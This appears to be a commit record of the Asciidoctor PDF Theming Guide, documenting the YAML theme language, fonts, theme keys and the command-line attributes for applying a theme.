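+\nFor example, the name `basic` resolves to the file _basic-theme.yml_, whereas a full file name such as `custom-settings.yml` (a hypothetical name, used here only for illustration) is loaded as-is:\n+\n $ asciidoctor-pdf -a pdf-style=basic document.adoc\n $ asciidoctor-pdf -a pdf-style=custom-settings.yml document.adoc\n\npdf-fontsdir:: The directory where the fonts used by your theme, if any, are located.\n_Specifying an absolute path is recommended._\n\nLet's assume that you've put your theme files inside a directory named `resources` with the following layout:\n\n....\ndocument.adoc\nresources\/\n themes\/\n basic-theme.yml\n fonts\/\n roboto-normal.ttf\n roboto-italic.ttf\n roboto-bold.ttf\n roboto-bold_italic.ttf\n....\n\nHere's how you'd load your theme when calling Asciidoctor PDF:\n\n $ asciidoctor-pdf -a pdf-stylesdir=resources\/themes -a pdf-style=basic -a pdf-fontsdir=resources\/fonts\n\nIf all goes well, Asciidoctor PDF should run without an error or warning.\n\nNOTE: You only need to specify the `pdf-fontsdir` if you are using custom fonts in your theme.\n\nYou can skip setting the `pdf-stylesdir` attribute and just pass the absolute path of your theme file to the `pdf-style` attribute.\n\n $ asciidoctor-pdf -a pdf-style=resources\/themes\/basic-theme.yml -a pdf-fontsdir=resources\/fonts\n\nHowever, in this case, image paths in your theme won't be resolved properly.\n\nPaths are resolved relative to the current directory.\nHowever, in the future, this may change so that paths are resolved relative to the base directory (typically the document's directory).\nTherefore, it's recommended that you specify absolute paths for now to future-proof your configuration.\n\n $ asciidoctor-pdf -a pdf-stylesdir=\/path\/to\/resources\/themes -a pdf-style=basic -a pdf-fontsdir=\/path\/to\/resources\/fonts\n","old_contents":"= Asciidoctor PDF Theming Guide\nDan Allen <https:\/\/github.com\/mojavelinux>\n:toc: macro\n:icons: font\n:idprefix:\n:idseparator: -\n:window: _blank\n\n\/\/\/\/\nTopics remaining to document:\n* transparent color\n* additional fonts provided by Asciidoctor PDF\n* images\n* title page layout\n* title image\n* title page background image\n* keys\n* how to apply the theme\n\/\/\/\/\n\nThe theming system in Asciidoctor PDF is used to control the layout and styling of the PDF file that Asciidoctor PDF generates from AsciiDoc.\nThe theme is driven by a YAML-based configuration file.\nThis document explains how the theming system works, how to define a custom theme and how to enable the theme when running Asciidoctor PDF.\n\ntoc::[]\n\n== Language overview\n\nThe theme language in Asciidoctor PDF is based on the http:\/\/en.wikipedia.org\/wiki\/YAML[YAML] data format and incorporates many concepts from CSS and SASS.\nTherefore, if you have a background in web design, the theme language should be immediately familiar to you.\n\nLike CSS, themes have both selectors and properties, but only a fraction of what CSS supports.\nUnlike CSS, all selectors are implicit (e.g., `heading`), so you customize the theme primarily by manipulating pre-defined property values (e.g., `font_color`).\n\nA theme (or style) is described in a YAML-based data format and stored in a dedicated theme file.\nYAML is a human-friendly data format that resembles 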
CSS and helps to describe the theme.\nThe theme language adds some extra features to YAML, such as variables, basic math, measurements and color values.\nThese enhancements will be explained in detail in later sections.\n\nThe theme file must be named _<name>-theme.yml_, where `<name>` is the name of the theme.\n\nHere's an example of a basic theme file:\n\n.basic-theme.yml\n[source,yaml]\n----\npage:\n layout: portrait\n margin: [0.75in, 1in, 0.75in, 1in]\n size: Letter\nbase:\n font_color: #333333\n font_family: Times-Roman\n font_size: 12\n line_height_length: 17\n line_height: $base_line_height_length \/ $base_font_size\nvertical_rhythm: $base_line_height_length\nheading:\n font_color: #262626\n font_size: 17\n font_style: bold\n line_height: 1.2\n margin_bottom: $vertical_rhythm\nlink:\n font_color: #002FA7\noutline_list:\n indent: $base_font_size * 1.5\n----\n\nWhen creating a new theme, you only have to define the keys you want to override from the base theme.\nThe converter uses the information from this map to help construct the PDF.\nAll the available keys are documented in <<keys>>.\n\nKeys may be nested to an arbitrary depth to eliminate redundant prefixes (an approach inspired by SASS).\nOnce the theme is loaded, all keys are flattened into a single map of qualified keys.\nNesting is simply a shorthand way of organizing the keys.\nIn the end, a theme is just a map of key\/value pairs.\n\nNested keys are adjoined to their parent key with an underscore (`_`).\nThis means the selector part (e.g., `link`) is combined with the property name (e.g., `font_color`) into a single, qualified key (e.g., `link_font_color`).\n\nFor example, let's assume we want to set the base (i.e., global) font size and color.\nThese keys may be written longhand:\n\n[source,yaml]\n----\nbase_font_color: #333333\nbase_font_family: Times-Roman\nbase_font_size: 12\n----\n\nOr, to avoid having to type the prefix `base_` multiple times, the keys may be written hierarchically:\n\n[source,yaml]\n----\nbase:\n font_color: #333333\n font_family: Times-Roman\n font_size: 12\n----\n\nOr even:\n\n[source,yaml]\n----\nbase:\n font:\n color: #333333\n family: Times-Roman\n size: 12\n----\n\nEach level of nesting must be indented by twice the amount of indentation of the parent level.\nAlso note the placement of the colon after each key name.\n\n== Values\n\nThe value of a key may be one of the following types:\n\n* String\n - Font family name (e.g., Roboto)\n - Font style (normal, bold, italic, bold_italic)\n - Alignment (left, center, right, justify)\n - Color as hex string (e.g., #ffffff)\n - Image path\n* Number (integer or float) with optional units (default unit is points)\n* Array\n - Color as RGB array (e.g., [51, 51, 51])\n - Color CMYK array (e.g., [50, 100, 0, 0])\n - Margin (e.g., [1in, 1in, 1in, 1in])\n - Padding (e.g., [1in, 1in, 1in, 1in])\n* Variable reference (e.g., $base_font_color)\n* Math expression\n\nNote that keys almost always require a value of a specific type, as documented in <<keys>>.\n\n=== Inheritance\n\nLike CSS, inheritance is a key feature in the Asciidoctor PDF theme language.\nFor many of the properties, if a key is not specified, the key inherits the value applied to the parent content in the content hierarchy.\nThis behavior saves you from having to specify properties unless you want to override the inherited value.\n\nThe following keys are inherited:\n\n* font_family\n* font_color\n* font_size\n* font_style\n* line_height (currently some exceptions)\n* text_transform (only for 
headings)\n* margin_bottom (falls back to $vertical_rhythm)\n\n.Heading Inheritance\n****\nHeadings are special in that they inherit starting from a specific heading level (e.g., `heading_font_size_h2`) to the heading category (e.g., `heading_font_size`) and then directly to the base value (e.g., `base_font_size`), skipping any enclosing context.\n****\n\n=== Variables\n\nTo save you from having to type the same value in your theme over and over, or to allow you to base one value on another, the theme language supports variables.\nVariables consist of the key name preceded by a dollar (`$`) (e.g., `$base_font_size`).\nAny qualified key that has already been defined can be referenced in the value of another key.\n(In order words, as soon as the key is assigned, it's available to be used as a variable).\n\nFor example, once the following line is processed,\n\n[source,yaml]\n----\nbase:\n font_color: #333333\n----\n\nthe variable `$base_font_color` will be available for use in subsequent lines and will resolve to `#333333`.\n\nLet's say you want to make the font color of the sidebar title the same as the heading font color.\nJust assign the value `$heading_font_color` to the `$sidebar_title_font_color`.\n\n[source,yaml]\n----\nheading:\n font_color: #191919\nsidebar:\n title:\n font_color: $heading_font_color\n----\n\nYou can also use variables in math expressions to use one value to build another.\nThis is commonly done to set font sizes proportionally.\nIt also makes it easy to test different values very quickly.\n\n[source,yaml]\n----\nbase:\n font_size: 12\n font_size_large: $base_font_size * 1.25\n font_size_small: $base_font_size * 0.85\n----\n\nWe'll cover more about math expressions in the next section.\n\n=== Math expressions & functions\n\nThe theme language supports basic math operations to support calculated values.\nThe following table lists the supported operations and the corresponding operator for each.\n\n[%header%autowidth]\n|===\n|Operation |Operator\n\n|multiply\n|*\n\n|divide\n|\/\n\n|add\n|+\n\n|subtract\n|-\n|===\n\nNOTE: Like programming languages, multiple and divide take precedence over add and subtract.\n\nThe operator must always be surrounded by a space on either side.\nHere's an example of a math expression with fixed values.\n\n[source,yaml]\n----\nconum:\n line_height: 4 \/ 3\n----\n\nVariables may be used in place of numbers anywhere in the expression:\n\n[source,yaml]\n----\nbase:\n font_size: 12\n font_size_large: $base_font_size * 1.25\n----\n\nValues used in a math expression are automatically coerced to a float value before the operation.\nIf the result of the expression is an integer, the value is coerced to an integer afterwards.\n\nIMPORTANT: Numeric values less than 1 must have a 0 before the decimal point (e.g., 0.85).\n\nThe theme language also supports several functions for rounding the result of a math expression.\nThe following functions may be used if they surround the whole value or expression for a key.\n\nround(...):: Rounds the number to the nearest half integer.\nfloor(...):: Rounds the number up to the next integer.\nceil(...):: Rounds the number down the previous integer.\n\nYou might use these functions in font size calculations so that you get more exact values.\n\n[source,yaml]\n----\nbase:\n font_size: 12.5\n font_size_large: ceil($base_font_size * 1.25)\n----\n\n=== Measurement units\n\nSeveral of the keys require a value in points (pt), the unit of measure for the PDF canvas.\nA point is defined as 1\/72 of an inch.\nHowever, us 
humans like to think in real world units like inches (in), centimeters (cm) or millimeters (mm).\nYou can let the theme do this conversion for you automatically by adding a unit notation next to any number.\n\nThe following units are supported:\n\n[%header%autowidth]\n|===\n|Unit |Suffix\n\n|Inches\n|in\n\n|Centimeter\n|cm\n\n|Millimeter\n|mm\n\n|Points\n|pt\n|===\n\nHere's an example of how you can use inches to define the page margins:\n\n[source,yaml]\n----\npage:\n margin: [0.75in, 1in, 0.75in, 1in]\n----\n\n=== Colors\n\nThe theme language supports color values in three formats:\n\nHex:: A string of 3 or 6 characters with an optional leading `#`.\nRGB:: An array of numeric values ranging from 0 to 255.\nCMYK:: An array of numeric values ranging from 0 to 1 or from 0% to 100%.\n\n==== Hex\n\nThe hex color value is likely most familiar to web developers.\nThe value must be either 3 or 6 characters (case insensitive) with an optional leading hash (`#`).\n\nThe following are all equivalent values for the color red:\n\n[%autowidth,cols=4]\n|===\n|f00\n|#f00\n|ff0000\n|#ff0000\n|F00\n|#F00\n|FF0000\n|#FF0000\n|===\n\nHere's how a hex color value appears in the theme file:\n\n[source,yaml]\n----\nbase:\n font_color: #ff0000\n----\n\n==== RGB\n\nAn RGB array value must be three numbers ranging from 0 to 255.\nThe values must be separated by commas and be surrounded by square brackets.\n\nNOTE: An RGB array is automatically converted to a hex string internally, so there's no difference between ff0000 and [255, 0, 0].\n\nHere's how to specify the color red in RGB:\n\n* [255, 0, 0]\n\nHere's how a RGB color value appears in the theme file:\n\n[source,yaml]\n----\nbase:\n font_color: [255, 0, 0]\n----\n\n==== CMYK\n\nA CMYK array value must be four numbers ranging from 0 and 1 or from 0% to 100%.\nThe values must be separated by commas and be surrounded by square brackets.\n\nUnlike the RGB array, the CMYK array _is not_ converted to a hex string internally.\nPDF has native support for CMYK colors, so you can preserve the original color values in the final PDF.\n\nHere's how to specify the color red in CMYK:\n\n* [0, 0.99, 1, 0]\n* [0, 99%, 100%, 0]\n\nHere's how a CMYK color value appears in the theme file:\n\n[source,yaml]\n----\nbase:\n font_color: [0, 0.99, 1, 0]\n----\n\n=== Images\n\nPENDING\n\n== Fonts\n\nYou can select from built-in PDF fonts or custom fonts loaded from TrueType font (TTF) files.\nIf you want to use custom fonts, you must first declare them in your theme file.\n\n=== Built-in fonts\n\nThe names of the built-in fonts (for general-purpose text) are as follows:\n\n[%header%autowidth]\n|===\n|Font Name |Font Family\n\n|Helvetica\n|sans-serif\n\n|Times-Roman\n|serif\n\n|Courier\n|monospace\n|===\n\nUsing a built-in font requires no additional files.\nYou can use the key anywhere a `font_family` property is accepted in the theme file.\nFor example:\n\n[source,yaml]\n----\nbase:\n font_family: Times-Roman\n----\n\nHowever, when you use a built-in font, the characters that you use in your document are limited to the WINANSI (http:\/\/en.wikipedia.org\/wiki\/Windows-1252[Windows-1252]) code set.\nWINANSI includes most of the characters needed for writing in Western languages (English, French, Spanish, etc).\nFor anything outside of that, PDF is BYOF (Bring Your Own Font).\n\nEven though the built-in fonts require the content to be encoded in WINANSI, _you still type your AsciiDoc document in UTF-8_.\nAsciidoctor PDF encodes the content into WINANSI when building the PDF.\nAny 
characters in your AsciiDoc document that cannot be encoded will be replaced with an underscore (`_`).\n\n=== Custom fonts\n\nThe limited character set of WINANSI, or the bland look of the built-in fonts, may motivate you to load your own font.\nCustom fonts can enhance the look of your PDF theme substantially.\n\nTo start, you need to find a collection of TTF file of the font you want to use.\nA collection typically consists of all four styles of a font:\n\n* normal\n* italic\n* bold\n* bold_italic\n\nYou'll need all four styles to support AsciiDoc content properly.\n_Asciidoctor PDF cannot italicize a font that is not italic like a browser can._\n\nOnce you've obtained the TTF files, put them into a directory in your project where you want to store the fonts.\nIt's recommended that you name them consistently so it's easier to type the names in the theme file.\n\nLet's assume the name of the font is https:\/\/github.com\/google\/roboto\/tree\/master\/out\/RobotoTTF[Roboto].\nName the files as follows:\n\n* roboto-normal.ttf (_originally Roboto-Regular.ttf_)\n* roboto-italic.ttf (_originally Roboto-Italic.ttf_)\n* roboto-bold.ttf (_originally Roboto-Bold.ttf_)\n* roboto-bold_italic.ttf (_originally Roboto-BoldItalic.ttf_)\n\nNext, declare the font under the `font_catalog` key at the top of your theme file, giving it a unique key (e.g., `Roboto`).\n\n[source,yaml]\n----\nfont:\n catalog:\n Roboto:\n normal: roboto-normal.ttf\n italic: roboto-italic.ttf\n bold: roboto-bold.ttf\n bold_italic: roboto-bold_italic.ttf\n----\n\nYou can use the key you gave to the font in the font catalog anywhere a `font_family` property is accepted in the theme file.\nFor instance, to use the Roboto font for all headings, you'd use:\n\n[source,yaml]\n----\nheading:\n font_family: Roboto\n----\n\nWhen you execute Asciidoctor PDF, you need to specify the directory where the fonts reside using the `pdf-fontsdir` attribute:\n\n $ asciidoctor-pdf -a pdf-style=basic-theme.yml -a pdf-fontsdir=path\/to\/fonts document.adoc\n\nWARNING: Currently, all fonts referenced by the theme need to be present in the directory specified by the `pdf-fontsdir` attribute.\n\nYou can add any number of fonts to the catalog.\nEach font must be assigned a unique key, as shown here:\n\n[source,yaml]\n----\nfont:\n catalog:\n Roboto:\n normal: roboto-normal.ttf\n italic: roboto-italic.ttf\n bold: roboto-bold.ttf\n bold_italic: roboto-bold_italic.ttf\n RobotoLight:\n normal: roboto-light-normal.ttf\n italic: roboto-light-italic.ttf\n bold: roboto-light-bold.ttf\n bold_italic: roboto-light-bold_italic.ttf\n----\n\n=== Fallback fonts\n\nIf one of your fonts is missing a character that is used in a document, such as special symbols, you can tell Asciidoctor PDF to retrieve the character from a fallback font.\nYou only need to specify one fallback font...typically one that has a full set of symbols.\n\nLike with other custom fonts, you first need to declare the fallback font.\nLet's choose https:\/\/android.googlesource.com\/platform\/frameworks\/base\/+\/master\/data\/fonts\/[Droid Sans Fallback].\nYou can map all the styles to a single font file (since bold and italic don't usually make sense for symbols).\n\n[source,yaml]\n----\nfont:\n catalog:\n Roboto:\n normal: roboto-normal.ttf\n italic: roboto-italic.ttf\n bold: roboto-bold.ttf\n bold_italic: roboto-bold_italic.ttf\n DroidSansFallback:\n normal: droid-sans-fallback.ttf\n italic: droid-sans-fallback.ttf\n bold: droid-sans-fallback.ttf\n bold_italic: droid-sans-fallback.ttf\n----\n\nNext, 
assign the key to the `fallbacks` key under the `font_catalog` key.\nBe sure to surround the key name in square brackets as shown below.\n\n[source,yaml]\n----\nfont:\n catalog:\n Roboto:\n normal: roboto-normal.ttf\n italic: roboto-italic.ttf\n bold: roboto-bold.ttf\n bold_italic: roboto-bold_italic.ttf\n DroidSansFallback:\n normal: droid-sans-fallback.ttf\n italic: droid-sans-fallback.ttf\n bold: droid-sans-fallback.ttf\n bold_italic: droid-sans-fallback.ttf\n fallbacks: [DroidSansFallback]\n----\n\nTIP: If you are using more than one fallback font, separate each key name by a comma.\n\nThat's it!\nNow you're covered.\nYou don't need to reference the fallback font anywhere else in your theme file to use it.\n\nCAUTION: Using a fallback font does slow down PDF generation slightly.\nIt's best to select fonts that have all the characters you need.\n\n== Keys\n\nTBW\n\n=== Page\n\n[cols=\"1d,1d,2m\"]\n|===\n|Key |Value Type |Example\n\n|page_background_color\n|<<colors,color>>\n|background_color: ffffff\n\n|page_layout\n|portrait, landscape\n|layout: portrait\n\n|page_margin\n|<<measurement-units,measurement>>, <<measurement-units,measurement array [4]>>\n|margin: [0.5in, 0.67in, 0.67in, 0.67in]\n\n|page_size\n|named size, <<measurement-units,measurement array [2]>>\n|size: Letter\n|===\n\n=== Base\n\n[cols=\"1d,1d,2m\"]\n|===\n|Key |Value Type |Example\n\n|base_font_color\n|<<colors,color>>\n|font_color: #333333\n\n|base_font_family\n|<<fonts,font family name>>\n|font_family: NotoSerif\n\n|base_font_size\n|<<values,number>>\n|font_size: 10.5\n\n|base_line_height_length\n|<<values,number>>\n|line_height_length: 12\n\n|base_line_height\n|<<values,number>>\n|line_height: 1.14\n\n|base_font_size_large\n|<<values,number>>\n|font_size_large: 13\n\n|base_font_size_small\n|<<values,number>>\n|font_size_small: 9\n\n|base_font_style\n|normal, italic, bold, bold_italic\n|font_style: normal\n\n|base_align\n|left, center, right, justify\n|align: justify\n\n|base_border_radius\n|<<values,number>>\n|border_radius: 4\n\n|base_border_width\n|<<values,number>>\n|border_width: 0.5\n\n|base_border_color\n|<<colors,color>>\n|border_color: eee\n|===\n\n=== Vertical and horizontal rhythm\n\n[cols=\"1d,1d,2m\"]\n|===\n|Key |Value Type |Example\n\n|vertical_rhythm\n|<<values,number>>\n|vertical_rhythm: 12\n\n|horizontal_rhythm\n|<<values,number>>\n|horizontal_rhythm: 12\n|===\n\n=== Link\n\n[cols=\"1d,1d,2m\"]\n|===\n|Key |Value Type |Example\n\n|link_font_color\n|<<colors,color>>\n|font_color: 428BCA\n\n|link_font_family\n|<<fonts,font family name>>\n|font_family: Roboto\n\n|link_font_size\n|<<values,number>>\n|font_size: 9\n\n|link_font_style\n|normal, italic, bold, bold_italic\n|font_style: normal\n|===\n\n=== Literal inline\n\nThe literal key is used for inline monospaced text in prose and table cells.\n\n[cols=\"1d,1d,2m\"]\n|===\n|Key |Value Type |Example\n\n|literal_font_color\n|<<colors,color>>\n|font_color: B12146\n\n|literal_font_family\n|<<fonts,font family name>>\n|font_family: Mplus1mn\n\n|literal_font_size\n|<<values,number>>\n|font_size: 12\n\n|literal_font_style\n|normal, italic, bold, bold_italic\n|font_style: bold\n|===\n\n=== Heading\n\n[cols=\"1d,1d,2m\"]\n|===\n|Key |Value Type |Example\n\n|heading_font_color\n|<<colors,color>>\n|font_color: 333333\n\n|heading_h<n>_font_color\n|<<colors,color>>\n|h2_font_color: [0, 99%, 100%, 0]\n\n|heading_font_family\n|<<fonts,font family name>>\n|font_family: NotoSerif\n\n|heading_h<n>_font_family\n|<<fonts,font family name>>\n|h4_font_family: 
Roboto\n\n|heading_font_size\n|<<values,number>>\n|font_size: 9\n\n|heading_h<n>_font_size\n|<<values,number>>\n|h6_font_size: round($base_font_size * 1.7)\n\n|heading_font_style\n|normal, italic, bold, bold_italic\n|font_style: bold\n\n|heading_h<n>_font_style\n|normal, italic, bold, bold_italic\n|h3_font_style: bold_italic\n\n|heading_line_height\n|<<values,number>>\n|line_height: 1.2\n\n|heading_margin_top\n|<<measurement-units,measurement>>\n|margin_top: $vertical_rhythm * 0.2\n\n|heading_margin_bottom\n|<<measurement-units,measurement>>\n|margin_bottom: 9.600\n|===\n\n=== Title page\n\n[cols=\"1d,1d,2m\"]\n|===\n|Key |Value Type |Example\n\n|title_page_align\n|left, center, right, justify\n|align: right\n\n|title_page_title_top\n|percentage\n|title_top: 55%\n\n|title_page_title_font_size\n|<<values,number>>\n|title_font_size: 27\n\n|title_page_title_font_color\n|<<colors,color>>\n|title_font_color: 999999\n\n|title_page_title_line_height\n|<<values,number>>\n|title_line_height: 0.9\n\n|title_page_subtitle_font_size\n|<<values,number>>\n|subtitle_font_size: 18\n\n|title_page_subtitle_font_style\n|normal, italic, bold, bold_italic\n|subtitle_font_style: bold_italic\n\n|title_page_subtitle_line_height\n|<<values,number>>\n|subtitle_line_height: 1\n\n|title_page_authors_margin_top\n|<<measurement-units,measurement>>\n|authors_margin_top: 13.125\n\n|title_page_authors_font_size\n|<<values,number>>\n|authors_font_size: $base_font_size_large\n\n|title_page_authors_font_color\n|<<colors,color>>\n|authors_font_color: 181818\n\n|title_page_revision_margin_top\n|<<measurement-units,measurement>>\n|revision_margin_top: 13.125\n|===\n\n=== Block\n\n\/\/ Blocks include admonition, example, quote, verse, sidebar, image, listing, literal, and table.\n\n[cols=\"1d,1d,2m\"]\n|===\n|Key |Value Type |Example\n\n|block_padding\n|<<measurement-units,measurement>>, <<measurement-units,measurement array [4]>>\n|padding: [12, 15, 12, 15]\n\n|block_margin_top\n|<<measurement-units,measurement>>\n|margin_top: 0\n\n|block_margin_bottom\n|<<measurement-units,measurement>>\n|margin_bottom: 1\n|===\n\n=== Caption\n\n[cols=\"1d,1d,2m\"]\n|===\n|Key |Value Type |Example\n\n|caption_font_color\n|<<colors,color>>\n|font_color: 333333\n\n|caption_font_family\n|<<fonts,font family name>>\n|font_family: Mplus1mn\n\n|caption_font_size\n|<<values,number>>\n|font_size: 11\n\n|caption_font_style\n|normal, italic, bold, bold_italic\n|font_style: italic\n\n|caption_align\n|left, center, right, justify\n|align: left\n\n|caption_margin_inside\n|<<measurement-units,measurement>>\n|margin_inside: 3\n\n|caption_margin_outside\n|<<measurement-units,measurement>>\n|margin_outside: 0\n|===\n\n=== Code\n\n[cols=\"1d,1d,2m\"]\n|===\n|Key |Value Type |Example\n\n|code_font_color\n|<<colors,color>>\n|font_color: 333333\n\n|code_font_family\n|<<fonts,font family name>>\n|font_family: Mplus1mn\n\n|code_font_size\n|<<values,number>>\n|font_size: 11\n\n|code_font_style\n|normal, italic, bold, bold_italic\n|font_style: italic\n\n|code_padding\n|<<measurement-units,measurement>>, <<measurement-units,measurement array [4]>>\n|padding: 11\n\n|code_line_height\n|<<values,number>>\n|line_height: 1.25\n\n|code_background_color\n|<<colors,color>>\n|background_color: F5F5F5\n\n|code_border_color\n|<<colors,color>>\n|border_color: CCCCCC\n\n|code_border_radius\n|<<values,number>>\n|border_radius: 4\n\n|code_border_width\n|<<values,number>>\n|border_width: 0.75\n|===\n\n=== Blockquote\n\n[cols=\"1d,1d,2m\"]\n|===\n|Key |Value Type 
|Example\n\n|blockquote_font_color\n|<<colors,color>>\n|font_color: 333333\n\n|blockquote_font_family\n|<<fonts,font family name>>\n|font_family: Notoserif\n\n|blockquote_font_size\n|<<values,number>>\n|font_size: 13\n\n|blockquote_font_style\n|normal, italic, bold, bold_italic\n|font_style: bold\n\n|blockquote_border_width\n|<<values,number>>\n|border_width: 5\n\n|blockquote_border_color\n|<<colors,color>>\n|border_color: EEEEEE\n\n|blockquote_cite_font_size\n|<<values,number>>\n|cite_font_size: 9\n\n|blockquote_cite_font_color\n|<<colors,color>>\n|cite_font_color: 999999\n\n|blockquote_cite_font_family\n|<<fonts,font family name>>\n|cite_font_family: Notoserif\n\n|blockquote_cite_font_style\n|normal, italic, bold, bold_italic\n|cite_font_style: bold\n\n|===\n\n=== Sidebar\n\n[cols=\"1d,1d,2m\"]\n|===\n|Key |Value Type |Example\n\n|sidebar_border_color\n|<<colors,color>>\n|border_color: FFFFFF\n\n|sidebar_border_radius\n|<<values,number>>\n|border_radius: 4\n\n|sidebar_border_width\n|<<values,number>>\n|border_width: 0.5\n\n|sidebar_background_color\n|<<colors,color>>\n|background_color: EEEEEE\n\n|sidebar_title_font_color\n|<<colors,color>>\n|title_font_color: 333333\n\n|sidebar_title_font_family\n|<<fonts,font family name>>\n|title_font_family: NotoSerif\n\n|sidebar_title_font_size\n|<<values,number>>\n|title_font_size: 13\n\n|sidebar_title_font_style\n|normal, italic, bold, bold_italic\n|title_font_style: bold\n\n|sidebar_title_align\n|left, center, right, justify\n|title_align: center\n|===\n\n=== Example\n\n[cols=\"1d,1d,2m\"]\n|===\n|Key |Value Type |Example\n\n|example_border_color\n|<<colors,color>>\n|border_color: EEEEEE\n\n|example_border_radius\n|<<values,number>>\n|border_radius: 4\n\n|example_border_width\n|<<values,number>>\n|border_width: 0.75\n\n|example_background_color\n|<<colors,color>>\n|background_color: transparent\n|===\n\n=== Admonition\n\n[cols=\"1d,1d,2m\"]\n|===\n|Key |Value Type |Example\n\n|admonition_border_color\n|<<colors,color>>\n|border_color: EEEEEE\n\n|admonition_border_width\n|<<values,number>>\n|border_width: 0.5\n|===\n\n=== Image\n\n[cols=\"1d,1d,2m\"]\n|===\n|Key |Value Type |Example\n\n|image_align_default\n|left, center, right, justify\n|align_default: left\n|===\n\n=== Lead\n\n[cols=\"1d,1d,2m\"]\n|===\n|Key |Value Type |Example\n\n|lead_font_size\n|<<values,number>>\n|font_size: 13\n\n|lead_line_height\n|<<values,number>>\n|line_height: 1.4\n|===\n\n=== Abstract\n\n[cols=\"1d,1d,2m\"]\n|===\n|Key |Value Type |Example\n\n|abstract_font_color\n|<<colors,color>>\n|font_color: 5C6266\n\n|abstract_font_size\n|<<values,number>>\n|font_size: 13\n\n|abstract_line_height\n|<<values,number>>\n|line_height: 1.4\n\n|abstract_font_style\n|normal, italic, bold, bold_italic\n|font_style: italic\n|===\n\n=== Thematic break\n\n[cols=\"1d,1d,2m\"]\n|===\n|Key |Value Type |Example\n\n|thematic_break_border_color\n|<<colors,color>>\n|border_colorL EEEEEE\n\n|thematic_break_margin_top\n|<<measurement-units,measurement>>\n|margin_top: 6\n\n|thematic_break_margin_bottom\n|<<measurement-units,measurement>>\n|margin_bottom: 18\n|===\n\n=== Description list\n\n[cols=\"1d,1d,2m\"]\n|===\n|Key |Value Type |Example\n\n|description_list_term_font_style\n|normal, italic, bold, bold_italic\n|term_font_style: italic\n\n|description_list_description_indent\n|<<values,number>>\n|description_indent: 15\n|===\n\n\n=== Outline list\n\n[cols=\"1d,1d,2m\"]\n|===\n|Key |Value Type |Example\n\n|outline_list_indent\n|<<measurement-units,measurement>>\n|list_indent: 
40\n\n|outline_list_item_spacing\n|<<measurement-units,measurement>>\n|item_spacing: 4\n|===\n\n=== Table\n\n[cols=\"1d,1d,2m\"]\n|===\n|Key |Value Type |Example\n\n|table_background_color\n|<<colors,color>>\n|background_color: FFFFFF\n\n|table_even_row_background_color\n|<<colors,color>>\n|even_row_background_color: F9F9F9\n\n|table_foot_background_color\n|<<colors,color>>\n|foot_background_color: F0F0F0\n\n|table_border_color\n|<<colors,color>>\n|border_color: DDDDDD\n\n|table_border_width\n|<<values,number>>\n|border_width: 0.5\n\n|table_cell_padding\n|<<measurement-units,measurement>>, <<measurement-units,measurement array [4]>>\n|cell_padding: [3, 3, 6, 3]\n|===\n\n[[key-toc]]\n=== Table of contents\n\n[cols=\"1d,1d,2m\"]\n|===\n|Key |Value Type |Example\n\n|toc_dot_leader_content\n|double-quoted string\n|dot_leader_content: \". \"\n\n|toc_dot_leader_color\n|<<colors,color>>\n|dot_leader_color: 999999\n\n|toc_font_color\n|<<colors,color>>\n|font_color: 333333\n\n|toc_h<n>_font_color\n|<<colors,color>>\n|h3_font_color: 999999\n\n|toc_font_family\n|<<fonts,font family name>>\n|font_family: NotoSerif\n\n|toc_font_size\n|<<values,number>>\n|font_size: 9\n\n|toc_font_style\n|normal, italic, bold, bold_italic\n|font_style: bold\n\n|toc_line_height\n|number\n|line_height: 1.5\n\n|toc_indent\n|<<measurement-units,measurement>>\n|indent: 20\n\n|toc_margin_top\n|<<measurement-units,measurement>>\n|indent: 20\n|===\n\n=== Running header & footer\n\n[cols=\"3,5,5m\"]\n|===\n|Key |Value Type |Example\n\n|header_background_color\n|<<colors,color>>\n|background_color: EEEEEE\n\n|header_border_color\n|<<colors,color>>\n|border_color: DDDDDD\n\n|header_border_width\n|<<measurement-units,measurement>>\n|border_width: 0.25\n\n|header_font_color\n|<<colors,color>>\n|font_color: 333333\n\n|header_font_family\n|<<fonts,font family name>>\n|font_family: NotoSerif\n\n|header_font_size\n|<<values,number>>\n|font_size: 9\n\n|header_font_style\n|normal, italic, bold, bold_italic\n|font_style: italic\n\n|header_height\n|<<measurement-units,measurement>>\n|height: 0.75in\n\n|header_padding\n|<<measurement-units,measurement>>, <<measurement-units,measurement array [4]>>\n|padding: [0, 3, 0, 3]\n\n|header_image_valign\n|top, center, bottom, <<measurement-units,measurement>>\n|image_valign: 4\n\n|header_valign\n|top, center, bottom\n|valign: center\n\n|header_<side>_content_<align>*\n|quoted string\nv|`recto_content:\n right: '\\{page-number}'`\n\n|footer_background_color\n|<<colors,color>>\n|background_color: EEEEEE\n\n|footer_border_color\n|<<colors,color>>\n|border_color: DDDDDD\n\n|footer_border_width\n|<<measurement-units,measurement>>\n|border_width: 0.25\n\n|footer_font_color\n|<<colors,color>>\n|font_color: 333333\n\n|footer_font_family\n|<<fonts,font family name>>\n|font_family: NotoSerif\n\n|footer_font_size\n|<<values,number>>\n|font_size: 9\n\n|footer_font_style\n|normal, italic, bold, bold_italic\n|font_style: italic\n\n|footer_height\n|<<measurement-units,measurement>>\n|height: 0.75in\n\n|footer_padding\n|<<measurement-units,measurement>>, <<measurement-units,measurement array [4]>>\n|padding: [0, 3, 0, 3]\n\n|footer_image_valign\n|top, center, bottom, <<measurement-units,measurement>>\n|image_valign: 4\n\n|footer_valign\n|top, center, bottom\n|valign: top\n\n|footer_<side>_content_<align>*\n|quoted string\nv|`recto_content:\n center: '\\{page-number}'`\n|===\n\n{asterisk} `<side>` can be `recto` (odd pages) or `verso` (even pages).\n`<align>` can be `left`, `center` or `right`.\n\nIMPORTANT: You must 
define a height for the running header or footer, respectively, or it will not be shown.\n\nNOTE: The background color spans the width of the page.\nWhen a background color is specified, the border also spans the width of the page.\n\nIn addition to the document-level attributes defined in the AsciiDoc document, the following attributes are available when defining the content keys in the footer:\n\n* page-count\n* page-number\n* document-title\n* document-subtitle\n* chapter-title\n* section-title\n* section-or-chapter-title\n\nFor example:\n\n[source,yaml]\n----\nfooter:\n height: 0.75in\n recto_content:\n right: '{section-or-chapter-title} | {page-number}'\n verso_content:\n left: '{page-number} | {chapter-title}'\n----\n\n== Applying your theme\n\nAfter creating a theme, you'll need to tell Asciidoctor PDF where to find it.\nThis is done using AsciiDoc attributes.\n\nThere are three AsciiDoc attributes that tell Asciidoctor PDF how to locate and apply your theme.\n\npdf-stylesdir:: The directory where the theme file is located.\n_Specifying an absolute path is recommended._\n\npdf-style:: The name of the YAML theme file to load.\nIf the name ends with `.yml`, it's assumed to be the complete name of a file.\nOtherwise, 